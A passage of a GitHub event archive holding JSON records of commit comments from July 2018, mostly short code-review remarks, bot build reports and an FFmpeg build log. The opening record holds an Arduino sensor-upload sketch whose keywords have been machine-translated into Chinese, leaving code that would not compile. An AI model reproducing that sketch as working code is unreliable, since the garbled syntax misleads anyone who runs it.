[j] = connection_info [i];\r\n    J ++;\r\n  }\r\n  串行。println（“ TCP套接字連接說明：”）;\r\n  串行。print（“ IP：”）;\r\n  串行。println（ip）;\r\n  串行。print（“ Port：”）;\r\n  串行。println（port）;\r\n  portnum = atoi（port）;\r\n} // getconnectInfo\r\n\r\nvoid  connectTCP（）{\r\n  //使用指定IP和端口與TCP服務器建立TCP連接\r\n  C。停止（）;\r\n  串行。println（“連接到TCP ”）;\r\n  而（0 ==℃。連接（“ 54.255.209.252 ”，443））\r\n  {\r\n    串行。println（“重新連接到TCP ”）;\r\n    延遲（1000）;\r\n  }\r\n  串行。println（“發送TCP連接”）;\r\n  C。println（tcpdata）;\r\n  C。println（）;\r\n  串行。println（“等待TCP響應：”）;\r\n} // connectTCP\r\n\r\nvoid  heartBeat（）{\r\n  串行。println（“發送TCP heartBeat ”）;\r\n  C。println（tcpdata）;\r\n  C。println（）;\r\n} // heartBeat\r\n\r\nvoid  senddata（）{\r\n  串行。println（“ senddata的開頭”）;\r\n  tempC = dht。readTemperature（）;\r\n  Humi = dht。readHumidity（）;\r\n\r\n  串行。println（“ 1 ”）;\r\n  char buffert [ 5 ];\r\n  char bufferh [ 5 ];\r\n  char bufferp [ 10 ];\r\n  串行。println（tempC）;\r\n  串行。println（Humi）;\r\n  串行。println（“ 2 ”）;\r\n\r\n  字符串數據= “溫度,, ” + 串（tempC）+ “ \\ n濕度,, ” + 串（HUMI）;\r\n  //字符串數據=“溫度，30.3 \\ nhumidity，28.9”;\r\n\r\n  串行。println（數據）;\r\n  int thisLength =數據。長度（）;\r\n  LWiFiClient c2;\r\n  unsigned  long t1 = millis（）;\r\n  而（0 == C2。連接（SITE_URL，80））\r\n  {\r\n    串行。println（“重新連接到WebSite ”）;\r\n    延遲（1000）;\r\n  }\r\n\r\n  延遲（500）;\r\n  串行。println（“發送POST請求”）;\r\n\r\n  C2。print（“ POST / mcs / v2 / devices / ”）;\r\n  C2。打印（DEVICEID）;\r\n  C2。println（“ / datapoints.csv HTTP / 1.1 ”）;\r\n  C2。print（“主持人：”）;\r\n  C2。println（SITE_URL）;\r\n  C2。print（“ deviceKey：”）;\r\n  C2。println（DEVICEKEY）;\r\n  C2。print（“ Content-Length：”）;\r\n  C2。println（thisLength）;\r\n  C2。println（“ Content-Type：text / csv ”）;\r\n  C2。println（“連接：關閉”）;\r\n  C2。println（）;\r\n  C2。println（數據）;\r\n\r\n  String dataget = “ ” ;\r\n  串行。println（“等待HTTP響應：”）;\r\n\r\n  int errorcount = 0 ;\r\n  而（！C2。可用（））\r\n  {\r\n    串行。println（“等待HTTP響應：”）;\r\n    errorcount + = 1 ;\r\n    if（errorcount> 10）{\r\n      C2。停止（）;\r\n      回歸 ;\r\n    }\r\n    延遲（100）;\r\n  }\r\n  而（c2）\r\n  {\r\n    int v = c2。read（）;\r\n    if（v！=  - 1）\r\n    {\r\n      串行。print（char（v））;\r\n      延遲（1）;\r\n    }\r\n    其他\r\n    {\r\n      串行。println（“不再內容，斷開連接”）;\r\n      C2。停止（）;\r\n    }\r\n  }\r\n  串行。println（“上傳成功”）;\r\n  延遲（3000）;\r\n  unsigned  long t2 = millis（）;\r\n} // senddata"}},"created_at":"2018-07-27T06:19:32Z"}
{"id":"8026772722","type":"CommitCommentEvent","actor":{"login":"amio"},"repo":{"name":"amio/badgen-service"},"payload":{"comment":{"id":29854329,"position":null,"line":null,"path":null,"commit_id":"b007ed7e6655c8badb09746f51b48a758610799c","created_at":"2018-07-27T06:20:36Z","updated_at":"2018-07-27T06:20:36Z","author_association":"OWNER","body":"Before & After\r\n\r\n<img width=\"364\" alt=\"screen shot 2018-07-27 at 2 19 14 pm\" src=\"https://user-images.githubusercontent.com/215282/43304829-21ad70a6-91a8-11e8-9774-854615aa1b1d.png\">\r\n\r\n<img width=\"364\" alt=\"screen shot 2018-07-27 at 2 18 44 pm\" src=\"https://user-images.githubusercontent.com/215282/43304848-2ef54a22-91a8-11e8-9c7a-dc7c153198c7.png\">"}},"created_at":"2018-07-27T06:20:36Z"}
{"id":"8026775598","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29854331,"position":null,"line":null,"path":null,"commit_id":"92fd61bbae08501ad37a19fae6fd4041d6d7f092","created_at":"2018-07-27T06:21:33Z","updated_at":"2018-07-27T06:21:33Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-27T06:21:33Z"}
{"id":"8026780206","type":"CommitCommentEvent","actor":{"login":"Jan-E"},"repo":{"name":"Jan-E/MyMpeg"},"payload":{"comment":{"id":29854339,"position":null,"line":null,"path":null,"commit_id":"e2ede549b96e1acb59b72b5a70ef8c41871636f5","created_at":"2018-07-27T06:23:07Z","updated_at":"2018-07-27T06:23:07Z","author_association":"OWNER","body":"Too funny. FFmpeg 4 running on Windows XP SP2. Only 40% slower than the X64 version on the same machine (Lenovo X220 i7) with Windows 7 Pro.\r\n\r\n> ffmpeg version N-91522-ga8ce6fb425 Copyright (c) 2000-2018 the FFmpeg developers\r\n> \r\n>   built with 'gcc 7.3.1 (GCC) 20180719' on 20180727\r\n>   configuration: --arch=x86 --target-os=mingw32 --cross-prefix=/home/jan/sandbox/cross_compilers/mingw-w64-i686/bin/i686-w64-mingw32- --pkg-config=pkg-config --pkg-config-flags=--static --enable-static --disable-shared --enable-pthreads --disable-w32threads -enable-gpl --enable-amf --enable-dxva2 --enable-ffnvcodec --enable-cuvid --enable-nvenc --enable-vdec -enable-d3d11va --disable-libmfx --enable-libx264 --enable-nonfree --enable-libfdk-aac --enable-libfaac --isable-doc --enable-runtime-cpudetect\r\n>   libavutil      56. 18.102 / 56. 18.102\r\n>   libavcodec     58. 21.106 / 58. 21.106\r\n>   libavformat    58. 17.101 / 58. 17.101\r\n>   libavdevice    58.  4.101 / 58.  4.101\r\n>   libavfilter     7. 26.100 /  7. 26.100\r\n>   libswscale      5.  2.100 /  5.  2.100\r\n>   libswresample   3.  2.100 /  3.  2.100\r\n>   libpostproc    55.  2.100 / 55.  2.100\r\n> Hyper fast Audio and Video encoder\r\n\r\n![xp2p2](https://user-images.githubusercontent.com/1757825/43301427-4ed787bc-9165-11e8-97ea-e112b07b29fc.png)\r\n"}},"created_at":"2018-07-27T06:23:07Z"}
{"id":"8026781026","type":"CommitCommentEvent","actor":{"login":"hangttt2"},"repo":{"name":"EvolableAsiaDevelopment/Developer-Day-Landing-Page"},"payload":{"comment":{"id":29854341,"position":5,"line":8,"path":"source/jade/blocks/organizer-block.jade","commit_id":"d31c96aab3167e628785015a6e9930107a92ef07","created_at":"2018-07-27T06:23:23Z","updated_at":"2018-07-27T06:23:23Z","author_association":"CONTRIBUTOR","body":"confirmed."}},"created_at":"2018-07-27T06:23:23Z"}
{"id":"8026782755","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29854344,"position":null,"line":null,"path":null,"commit_id":"0433255b367b8a81b1742a50901fdd4cf65e7263","created_at":"2018-07-27T06:23:57Z","updated_at":"2018-07-27T06:23:57Z","author_association":"NONE","body":"In your case you can try to add the en  passant status to the pawn key. this had to be done in position.cpp. \r\n\r\nHere are some implementation hints:\r\nThree functions are two change: `Position::set_state`, `Position::do_move` and `Position::do_null_move`.\r\nThe pawn key field is called there `pawnKey` and you need hthe hash keys `Zobrist::enpassant` and `Zobrist::side` (later because the side to move currently is not encoded in the pawn key or `Zobrist::en_passant` (this contains only the file of the ep square as information))):\r\n\r\nOk this could be little more tricky if not familiar because this going at a deeper SF implementation level as you normally need for your patches.\r\n\r\nIf you have the patient read the current code in the given code segments and try it. At problems you can ask.\r\n\r\nTo be honest i doesn't think this efforts payoff but if you interested to dive deeper in the SF code base for understanding try it!"}},"created_at":"2018-07-27T06:23:57Z"}
{"id":"8026783476","type":"CommitCommentEvent","actor":{"login":"hangttt2"},"repo":{"name":"EvolableAsiaDevelopment/Developer-Day-Landing-Page"},"payload":{"comment":{"id":29854345,"position":25,"line":22,"path":"source/scss/blocks/banner.scss","commit_id":"d31c96aab3167e628785015a6e9930107a92ef07","created_at":"2018-07-27T06:24:10Z","updated_at":"2018-07-27T06:24:10Z","author_association":"CONTRIBUTOR","body":"Ah, got it! Thanks"}},"created_at":"2018-07-27T06:24:10Z"}
{"id":"8026802476","type":"CommitCommentEvent","actor":{"login":"codeHusky"},"repo":{"name":"hsyyid/HuskyUI-Plugin"},"payload":{"comment":{"id":29854387,"position":null,"line":null,"path":null,"commit_id":"c99dcc5b8a0f242904b597f60f877895680c84da","created_at":"2018-07-27T06:30:08Z","updated_at":"2018-07-27T06:30:08Z","author_association":"NONE","body":":+1:"}},"created_at":"2018-07-27T06:30:08Z"}
{"id":"8026802913","type":"CommitCommentEvent","actor":{"login":"PetrHeinz"},"repo":{"name":"shopsys/shopsys"},"payload":{"comment":{"id":29854388,"position":5,"line":154,"path":"composer.json","commit_id":"222369d33d3364b4c1dd2c8dc563584b41401f2d","created_at":"2018-07-27T06:30:15Z","updated_at":"2018-07-27T06:30:15Z","author_association":"MEMBER","body":"The only reason behind this is just a missing sniff for YAMLs I think..."}},"created_at":"2018-07-27T06:30:15Z"}
{"id":"8026804462","type":"CommitCommentEvent","actor":{"login":"alecsboga"},"repo":{"name":"alexszentpetery/sci-projects"},"payload":{"comment":{"id":29854394,"position":50,"line":51,"path":"functions/src/main/java/ro/sci/functions/math/Calculator.java","commit_id":"ef88d5af747897746cc3fe992611f85bbe061a92","created_at":"2018-07-27T06:30:42Z","updated_at":"2018-07-27T06:30:42Z","author_association":"COLLABORATOR","body":"pai tot nu e rezolvata problema impartirii la 0 :D , adica daca tu ai expune clasa calculator pentru a fi refolosita, cineva din alt context decat Main tot ar putea da un b=0\r\n\r\ntre rezolvata problmea acolo unde apare, adica in metoda de impartire, acolo tre sa verifici daca b=0, si in caz ca da, tre sa iei o decizie\r\n\r\nInca ceva, vad ca in Calculator, toate metodele/functiile sunt statice, ne vrem asa :), scoate static si foloseste-te de o instanta de Calculator ;)"}},"created_at":"2018-07-27T06:30:42Z"}
{"id":"8026816241","type":"CommitCommentEvent","actor":{"login":"nagayev2002"},"repo":{"name":"yeriomin/play-store-api"},"payload":{"comment":{"id":29854418,"position":null,"line":null,"path":null,"commit_id":"41a81120af40659df5c5f609f3383cd676e79f21","created_at":"2018-07-27T06:34:19Z","updated_at":"2018-07-27T06:34:19Z","author_association":"NONE","body":"Perfect!"}},"created_at":"2018-07-27T06:34:19Z"}
{"id":"8026817456","type":"CommitCommentEvent","actor":{"login":"murumuthu"},"repo":{"name":"OpenIxia/IxNetwork"},"payload":{"comment":{"id":29854419,"position":null,"line":null,"path":null,"commit_id":"e2d4502ac84e41d384eeee156da124d18f1486f2","created_at":"2018-07-27T06:34:40Z","updated_at":"2018-07-27T06:34:40Z","author_association":"NONE","body":"removed hardcoded value and changed to variable"}},"created_at":"2018-07-27T06:34:40Z"}
{"id":"8026818887","type":"CommitCommentEvent","actor":{"login":"Sleeplikelion"},"repo":{"name":"MicrosoftDocs/windows-uwp"},"payload":{"comment":{"id":29854420,"position":null,"line":null,"path":null,"commit_id":"0dbb67bdd900b770dfbc6c4058d6961d489a5e24","created_at":"2018-07-27T06:35:07Z","updated_at":"2018-07-27T06:35:07Z","author_association":"NONE","body":" z"}},"created_at":"2018-07-27T06:35:07Z"}
{"id":"8026820069","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29854423,"position":null,"line":null,"path":null,"commit_id":"4b8c697be086c2830d66413f9c16eb50e0ecc45a","created_at":"2018-07-27T06:35:27Z","updated_at":"2018-07-27T06:35:27Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/4b8c697be086c2830d66413f9c16eb50e0ecc45a#commitcomment-29853424) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/6a7f941c2437a8d9b9884db0e2d3e4cb73514c8e/daily_2018_7_27/report.md). cc @ararslan"}},"created_at":"2018-07-27T06:35:27Z"}
{"id":"8026825324","type":"CommitCommentEvent","actor":{"login":"YOUR-WORST-TACO"},"repo":{"name":"YOUR-WORST-TACO/wpgtk"},"payload":{"comment":{"id":29854436,"position":null,"line":null,"path":null,"commit_id":"32d62db9fc9e072165f612fa1274a63e3d16894a","created_at":"2018-07-27T06:37:00Z","updated_at":"2018-07-27T06:37:00Z","author_association":"OWNER","body":"# pywal urxvt transparency support\r\n## my goal\r\nThe only thing I can imagine adding is support for fake transparency, but my real focus was to get the compositor transparency working.\r\n\r\n## my process\r\nit sources .Xresources and if it cant find that .Xdefaults (old method) to find the value urxvt.background/urxvt*background.\r\n\r\nit then determines an alpha value based on the following alpha settings for urxvt\r\nurxvt.background: [aa]#rrggbb\r\nor\r\nurxvt.background: rgba:rrrr/gggg/bbbb/aaaa\r\nand then sets the variable\r\npywal.util.Color.alpha_num to the string value of that acquired value\r\n\r\n## conclusion\r\nI have implemented checks to make sure that it only works if a valid alpha is configured\r\nvalid alpha is anything between 0-100 that is numerical.\r\n\r\nI am fairly certain everything is working perfectly although please check my code, I am a little rusty in python"}},"created_at":"2018-07-27T06:37:00Z"}
{"id":"8026825492","type":"CommitCommentEvent","actor":{"login":"cvidler"},"repo":{"name":"cvidler/rtmarchive"},"payload":{"comment":{"id":29854437,"position":13,"line":140,"path":"rtmarchive.sh","commit_id":"11b5efe2f51f5dcf701b027d80795a1944bf5b1e","created_at":"2018-07-27T06:37:04Z","updated_at":"2018-07-27T06:37:04Z","author_association":"OWNER","body":"#52 "}},"created_at":"2018-07-27T06:37:04Z"}
{"id":"8026831657","type":"CommitCommentEvent","actor":{"login":"FamousMai"},"repo":{"name":"FamousMai/laravel01"},"payload":{"comment":{"id":29854448,"position":null,"line":null,"path":null,"commit_id":"1ac4fbac7b2eb2080f510774d52904c3c86e6e38","created_at":"2018-07-27T06:38:57Z","updated_at":"2018-07-27T06:38:57Z","author_association":"OWNER","body":"完成 第八章 用户CRUD"}},"created_at":"2018-07-27T06:38:57Z"}
{"id":"8026831684","type":"CommitCommentEvent","actor":{"login":"lrwinx"},"repo":{"name":"lrwinx/shop"},"payload":{"comment":{"id":29854450,"position":null,"line":null,"path":null,"commit_id":"23490842fb1c9f9173f2c61387e30d5082a70286","created_at":"2018-07-27T06:38:58Z","updated_at":"2018-07-27T06:38:58Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-27T06:38:58Z"}
{"id":"8026838835","type":"CommitCommentEvent","actor":{"login":"axzx"},"repo":{"name":"sonata-project/SonataAdminBundle"},"payload":{"comment":{"id":29854457,"position":null,"line":null,"path":null,"commit_id":"56b0201c63c50e61e6bb002c78fdd1991924d347","created_at":"2018-07-27T06:41:06Z","updated_at":"2018-07-27T06:41:06Z","author_association":"CONTRIBUTOR","body":"Is this a good idea for sure? \r\nIn one project I have 250 admin services. This text will be very long."}},"created_at":"2018-07-27T06:41:06Z"}
{"id":"8026840508","type":"CommitCommentEvent","actor":{"login":"DivadlovesProgramming"},"repo":{"name":"DivadlovesProgramming/DivadlovesProgramming.github.io"},"payload":{"comment":{"id":29854459,"position":null,"line":null,"path":null,"commit_id":"d747bfc046cd499a863680ce150885a22fb96312","created_at":"2018-07-27T06:41:35Z","updated_at":"2018-07-27T06:41:35Z","author_association":"OWNER","body":"Description update "}},"created_at":"2018-07-27T06:41:35Z"}
{"id":"8026840845","type":"CommitCommentEvent","actor":{"login":"DivadlovesProgramming"},"repo":{"name":"DivadlovesProgramming/DivadlovesProgramming.github.io"},"payload":{"comment":{"id":29854460,"position":null,"line":null,"path":null,"commit_id":"d747bfc046cd499a863680ce150885a22fb96312","created_at":"2018-07-27T06:41:41Z","updated_at":"2018-07-27T06:41:41Z","author_association":"OWNER","body":"ere"}},"created_at":"2018-07-27T06:41:41Z"}
{"id":"8026842665","type":"CommitCommentEvent","actor":{"login":"goral09"},"repo":{"name":"rchain/rchain"},"payload":{"comment":{"id":29854465,"position":75,"line":75,"path":"shared/src/test/scala/coop/rchain/shared/CellSpec.scala","commit_id":"ef4433f25e5171e8d5a8796d324c9111a41ab255","created_at":"2018-07-27T06:42:12Z","updated_at":"2018-07-27T06:42:12Z","author_association":"COLLABORATOR","body":"I still don't get why `modify` has a signature `A => F[A]`. "}},"created_at":"2018-07-27T06:42:12Z"}
{"id":"8026845861","type":"CommitCommentEvent","actor":{"login":"greg0ire"},"repo":{"name":"sonata-project/SonataAdminBundle"},"payload":{"comment":{"id":29854470,"position":null,"line":null,"path":null,"commit_id":"56b0201c63c50e61e6bb002c78fdd1991924d347","created_at":"2018-07-27T06:43:09Z","updated_at":"2018-07-27T06:43:09Z","author_association":"CONTRIBUTOR","body":"> This text will be very long.\r\n\r\nIt will, but so what?"}},"created_at":"2018-07-27T06:43:09Z"}
{"id":"8026846880","type":"CommitCommentEvent","actor":{"login":"ZhdanovP"},"repo":{"name":"ZhdanovP/sdl_core"},"payload":{"comment":{"id":29854471,"position":6,"line":54,"path":"src/components/application_manager/include/application_manager/resumption/resumption_sql_queries.h","commit_id":"74f57a7656fab62831eb3e8ac544a1d3616bf7cd","created_at":"2018-07-27T06:43:28Z","updated_at":"2018-07-27T06:43:28Z","author_association":"OWNER","body":"@AByzhynar what is the problem with names?"}},"created_at":"2018-07-27T06:43:28Z"}
{"id":"8026848753","type":"CommitCommentEvent","actor":{"login":"StefanScherer"},"repo":{"name":"istopwg/ippsample"},"payload":{"comment":{"id":29854475,"position":null,"line":null,"path":null,"commit_id":"6d2df36ba8676e19d9e0bbe9aca9925c6d66fcf0","created_at":"2018-07-27T06:43:59Z","updated_at":"2018-07-27T06:43:59Z","author_association":"CONTRIBUTOR","body":"@michaelrsweet No problem. I have adjusted the `.travis.yml` to use a docker build.\r\nThen I have updated the packages to be installed in the `Dockerfile` as listed in the comment of the `.travis.yml`.\r\nThis Travis build looks quite good https://travis-ci.org/StefanScherer/ippsample/jobs/408816471\r\nI'll send a PR with the changes.\r\n"}},"created_at":"2018-07-27T06:43:59Z"}
{"id":"8026850452","type":"CommitCommentEvent","actor":{"login":"greg0ire"},"repo":{"name":"sonata-project/SonataAdminBundle"},"payload":{"comment":{"id":29854480,"position":null,"line":null,"path":null,"commit_id":"56b0201c63c50e61e6bb002c78fdd1991924d347","created_at":"2018-07-27T06:44:28Z","updated_at":"2018-07-27T06:44:28Z","author_association":"CONTRIBUTOR","body":"You're welcome to improve this with `levenshtein` if you want to"}},"created_at":"2018-07-27T06:44:28Z"}
{"id":"8026850952","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29854483,"position":null,"line":null,"path":null,"commit_id":"66b8644197b6fea0f1a4b6f994f14815aa7aeba2","created_at":"2018-07-27T06:44:37Z","updated_at":"2018-07-27T06:44:37Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - i386-Windows-7-VisualStudio-14: OK (2948 of 2948 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T06:44:37Z"}
{"id":"8026860890","type":"CommitCommentEvent","actor":{"login":"andriyanov"},"repo":{"name":"RackTables/racktables"},"payload":{"comment":{"id":29854507,"position":null,"line":null,"path":null,"commit_id":"0c1b0b11c930518f5a98cfa826af266105c37bcd","created_at":"2018-07-27T06:47:35Z","updated_at":"2018-07-27T06:47:35Z","author_association":"MEMBER","body":"I think so. It seems to me that is it still a legitimate config for a port.\r\nBut more important case is that it is now possible to assign \"A1\" config to a 'anymode' port.\r\n\r\nUser still can specify VLAN mask '2-4094' in a 802.1Q template to prevent using vlan 1."}},"created_at":"2018-07-27T06:47:35Z"}
{"id":"8026863309","type":"CommitCommentEvent","actor":{"login":"Rikk"},"repo":{"name":"arai-a/arai-a.github.io"},"payload":{"comment":{"id":29854512,"position":null,"line":null,"path":null,"commit_id":"fee21b5b60b9520283aba71767a0ca8d74f83c17","created_at":"2018-07-27T06:48:19Z","updated_at":"2018-07-27T06:48:19Z","author_association":"NONE","body":"Why?"}},"created_at":"2018-07-27T06:48:19Z"}
{"id":"8026863370","type":"CommitCommentEvent","actor":{"login":"harhail666"},"repo":{"name":"OpenKore/openkore"},"payload":{"comment":{"id":29854514,"position":null,"line":null,"path":null,"commit_id":"f00d069cf3cf623cd2f635b40e3f9dbdd0fe76ee","created_at":"2018-07-27T06:48:20Z","updated_at":"2018-07-27T06:48:20Z","author_association":"NONE","body":"Do you have an update for the patch today? Thanks in advance."}},"created_at":"2018-07-27T06:48:20Z"}
{"id":"8026863760","type":"CommitCommentEvent","actor":{"login":"puruhirave"},"repo":{"name":"puruhirave/DesignPatterns"},"payload":{"comment":{"id":29854516,"position":null,"line":null,"path":null,"commit_id":"954f09d836797df72c5fe7911759270bed0e3bba","created_at":"2018-07-27T06:48:27Z","updated_at":"2018-07-27T06:48:27Z","author_association":"OWNER","body":"del"}},"created_at":"2018-07-27T06:48:27Z"}
{"id":"8026864711","type":"CommitCommentEvent","actor":{"login":"curioswitch-role"},"repo":{"name":"curioswitch/curiostack"},"payload":{"comment":{"id":29854517,"position":null,"line":null,"path":null,"commit_id":"c2a4a0e7f03b885b89b97b9f34f3f3c64a3dbe27","created_at":"2018-07-27T06:48:45Z","updated_at":"2018-07-27T06:48:45Z","author_association":"NONE","body":"Build failed. Check the logs and try again.\n\nLogs:\nhttps://console.cloud.google.com/gcr/builds/3a58af65-318b-432e-b93e-a812a03d052e?project=153942441948"}},"created_at":"2018-07-27T06:48:45Z"}
{"id":"8026866667","type":"CommitCommentEvent","actor":{"login":"nanashi222"},"repo":{"name":"nanashi222/ideas"},"payload":{"comment":{"id":29854521,"position":null,"line":null,"path":null,"commit_id":"8a7f402b011fc00bdd11aa71216a51f255c43cd3","created_at":"2018-07-27T06:49:22Z","updated_at":"2018-07-27T06:49:22Z","author_association":"OWNER","body":"reversed the order of translation for the quote with Shakespeare translation"}},"created_at":"2018-07-27T06:49:22Z"}
{"id":"8026867147","type":"CommitCommentEvent","actor":{"login":"TisonKun"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29854524,"position":65,"line":308,"path":"doc/Language/exceptions.pod6","commit_id":"e85d8d1948c13f069a48cf7a897595fc343070d5","created_at":"2018-07-27T06:49:32Z","updated_at":"2018-07-27T06:49:32Z","author_association":"MEMBER","body":"Is there a style guide say we prefer not to capitalize letter in the middle of phrase?"}},"created_at":"2018-07-27T06:49:32Z"}
{"id":"8026867626","type":"CommitCommentEvent","actor":{"login":"Alin0320"},"repo":{"name":"Alin0320/ansible-role-mariadb"},"payload":{"comment":{"id":29854526,"position":null,"line":null,"path":null,"commit_id":"d695123497cc1a52ffbec3d61591ee2ea8ed68d6","created_at":"2018-07-27T06:49:40Z","updated_at":"2018-07-27T06:49:40Z","author_association":"OWNER","body":"add role name"}},"created_at":"2018-07-27T06:49:40Z"}
{"id":"8026868324","type":"CommitCommentEvent","actor":{"login":"arai-a"},"repo":{"name":"arai-a/arai-a.github.io"},"payload":{"comment":{"id":29854532,"position":null,"line":null,"path":null,"commit_id":"fee21b5b60b9520283aba71767a0ca8d74f83c17","created_at":"2018-07-27T06:49:53Z","updated_at":"2018-07-27T06:49:53Z","author_association":"OWNER","body":"because I created another github page for different project, and didn't want to redirect to unmht.org there.\r\n"}},"created_at":"2018-07-27T06:49:53Z"}
{"id":"8026869034","type":"CommitCommentEvent","actor":{"login":"therionman"},"repo":{"name":"guillermo85/viajofeliz"},"payload":{"comment":{"id":29854539,"position":null,"line":null,"path":null,"commit_id":"1e436e4308433558d61c53bf52a8095b626522e6","created_at":"2018-07-27T06:50:06Z","updated_at":"2018-07-27T06:50:06Z","author_association":"COLLABORATOR","body":"Falta emprolijar el Codigo y agregar todo a CSS. Tambien faltan unos mediaqueries minimos para lo que serian pantallas de 320px de ancho."}},"created_at":"2018-07-27T06:50:06Z"}
{"id":"8026869207","type":"CommitCommentEvent","actor":{"login":"TisonKun"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29854544,"position":65,"line":308,"path":"doc/Language/exceptions.pod6","commit_id":"e85d8d1948c13f069a48cf7a897595fc343070d5","created_at":"2018-07-27T06:50:08Z","updated_at":"2018-07-27T06:50:08Z","author_association":"MEMBER","body":"I am ok with this, but if we want to global consistent it, let's make it documented"}},"created_at":"2018-07-27T06:50:08Z"}
{"id":"8026874040","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29854566,"position":16,"line":16,"path":"BsuirFind.Foundation.Dto/Games/TeamDto.cs","commit_id":"4e276f6733de3778b408ab49c6633d14b790d720","created_at":"2018-07-27T06:51:30Z","updated_at":"2018-07-27T06:51:30Z","author_association":"COLLABORATOR","body":"Creat**ed**At is much better"}},"created_at":"2018-07-27T06:51:30Z"}
{"id":"8026874356","type":"CommitCommentEvent","actor":{"login":"JustPilz"},"repo":{"name":"Cordrear/theMovieDBProj"},"payload":{"comment":{"id":29854569,"position":21,"line":41,"path":"src/components/MovieDBApp/index.js","commit_id":"eb3a15694219099abea4afee4ad0a040bc03b792","created_at":"2018-07-27T06:51:35Z","updated_at":"2018-07-27T06:51:35Z","author_association":"NONE","body":"Данные вытащить деструктуризацией, переменные заполнить сокращённой записью условий"}},"created_at":"2018-07-27T06:51:35Z"}
{"id":"8026876721","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29854572,"position":54,"line":42,"path":"lesson8/validation.rb","commit_id":"b6e946bcbd13e35de4d3375e7496840c60d212ab","created_at":"2018-07-27T06:52:18Z","updated_at":"2018-07-27T06:52:18Z","author_association":"NONE","body":"\"тру\" здесь не нужен\r\nэтот возврат нужен только для метода `valid?` и у тебя в нем уже он есть"}},"created_at":"2018-07-27T06:52:18Z"}
{"id":"8026877413","type":"CommitCommentEvent","actor":{"login":"JustPilz"},"repo":{"name":"Cordrear/theMovieDBProj"},"payload":{"comment":{"id":29854574,"position":43,"line":60,"path":"src/components/MovieDBApp/index.js","commit_id":"eb3a15694219099abea4afee4ad0a040bc03b792","created_at":"2018-07-27T06:52:29Z","updated_at":"2018-07-27T06:52:29Z","author_association":"NONE","body":"в рендере разобрать данные деструктуризацией и в return указывать названия переменных"}},"created_at":"2018-07-27T06:52:29Z"}
{"id":"8026879217","type":"CommitCommentEvent","actor":{"login":"kuominglu"},"repo":{"name":"kuominglu/pi"},"payload":{"comment":{"id":29854576,"position":null,"line":null,"path":null,"commit_id":"2c9d923e63c5d89003bb32dbdbee7fcb23ac070f","created_at":"2018-07-27T06:52:59Z","updated_at":"2018-07-27T06:52:59Z","author_association":"OWNER","body":"int x =20;\r\nint r,g,b;\r\nsize(200, 200);\r\nstroke(255);\r\nbackground(255);\r\nfor (int i=0;i<5;i++){\r\n  r = int(random(255));\r\n  g = int(random(255));\r\n  b = int(random(255));\r\n  fill(r,g,b);\r\n  ellipse(x+i*30,20,20,20);\r\n}\r\n"}},"created_at":"2018-07-27T06:52:59Z"}
{"id":"8026883201","type":"CommitCommentEvent","actor":{"login":"guptarahul1985"},"repo":{"name":"guptarahul1985/GitDemo"},"payload":{"comment":{"id":29854583,"position":null,"line":null,"path":null,"commit_id":"247546454dca142a9dec7d563bd71020bbf4b174","created_at":"2018-07-27T06:54:09Z","updated_at":"2018-07-27T06:54:09Z","author_association":"OWNER","body":"merged"}},"created_at":"2018-07-27T06:54:09Z"}
{"id":"8026886586","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29854589,"position":20,"line":431,"path":"BsuirFind.Foundation/Services/TeamService.cs","commit_id":"4e276f6733de3778b408ab49c6633d14b790d720","created_at":"2018-07-27T06:55:10Z","updated_at":"2018-07-27T06:55:10Z","author_association":"COLLABORATOR","body":"@MikhailSkirukha \r\nKeep in mind, that as soon we deactivate user's team, we should stop fetching related gameTeams in some cases (e.g. when we are trying to get current user game team status)."}},"created_at":"2018-07-27T06:55:10Z"}
{"id":"8026887434","type":"CommitCommentEvent","actor":{"login":"pmorerio"},"repo":{"name":"szagoruyko/wide-residual-networks"},"payload":{"comment":{"id":29854590,"position":null,"line":null,"path":null,"commit_id":"52ba5bf71643af603785323f4ef926bc5d8acd86","created_at":"2018-07-27T06:55:24Z","updated_at":"2018-07-27T06:55:24Z","author_association":"NONE","body":"Dropout in the resnet block as in the original paper."}},"created_at":"2018-07-27T06:55:24Z"}
{"id":"8026888516","type":"CommitCommentEvent","actor":{"login":"vimplus"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29854592,"position":null,"line":null,"path":null,"commit_id":"b9992f4a08574efb47b6e6cd80eb1e888b9a1ede","created_at":"2018-07-27T06:55:43Z","updated_at":"2018-07-27T06:55:43Z","author_association":"NONE","body":"什么叫受控模式？"}},"created_at":"2018-07-27T06:55:43Z"}
